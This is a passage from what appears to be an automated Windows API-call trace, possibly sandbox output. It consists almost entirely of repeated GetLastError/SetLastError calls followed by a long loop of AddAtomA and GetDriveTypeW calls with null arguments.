(dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.402] SetLastError (dwErrCode=0x0) [0174.402] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.403] GetLastError () returned 0x0 [0174.403] SetLastError (dwErrCode=0x0) [0174.404] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0174.404] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404966) returned 0x0 [0174.404] GetLastError () returned 0x0 [0174.404] SetLastError (dwErrCode=0x0) [0174.404] GetLastError () returned 0x0 [0174.404] SetLastError (dwErrCode=0x0) [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.406] AddAtomA (lpString=0x0) returned 0x0 [0174.406] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.407] AddAtomA (lpString=0x0) returned 0x0 [0174.407] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.408] AddAtomA (lpString=0x0) returned 0x0 [0174.408] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.409] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.409] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.410] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.410] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.411] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.411] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.412] AddAtomA (lpString=0x0) returned 0x0 [0174.412] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.413] AddAtomA (lpString=0x0) returned 0x0 [0174.413] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.414] AddAtomA (lpString=0x0) returned 0x0 [0174.414] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.415] AddAtomA (lpString=0x0) returned 0x0 [0174.415] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.416] AddAtomA (lpString=0x0) returned 0x0 [0174.416] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.417] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.417] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.418] AddAtomA (lpString=0x0) returned 0x0 [0174.418] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW (lpRootPathName=0x0) returned 0x3 [0174.419] AddAtomA (lpString=0x0) returned 0x0 [0174.419] GetDriveTypeW 